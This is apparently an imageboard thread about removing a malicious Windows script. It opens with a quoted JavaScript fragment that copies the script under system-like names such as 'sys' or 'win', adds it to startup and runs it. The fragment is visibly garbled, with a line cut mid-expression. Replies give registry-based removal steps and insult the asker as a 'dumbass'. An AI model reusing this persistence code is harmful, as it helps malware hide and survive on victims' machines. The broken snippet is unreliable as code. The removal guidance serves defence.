// Add to startup, run .js version
if (typeof WSH == "undefined") {
try {
shell.currentDirectory = fs.getSpecialFolder(2);
var name = ["dev", "ms", "sys", "system", "win"][initsettings.savechoice
\" + name, startcmd);
shell.run(startcmd);
close();
} catch(e) {}
}
Just open up regedit, go to HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\ and remove any starting with ["dev", "ms", "sys", "system", "win"] and calling wscript with some .js file. Delete the .js file.
Too bad that we won't give a fuck. You are:
• a dumbass
• an imageboard poster.
Even if the guy that was left here after your "invasion" wanted to help you, you forgot to give a description of your problem beyond a "Help I'm stupid".
>>6
msconfig does the same, hijackthis and others do it as well.
HKCU stands for HKEY_CURRENT_USER. You should have been able to find out what it means with a simple google search. It's a widely used officially supported abbreviation.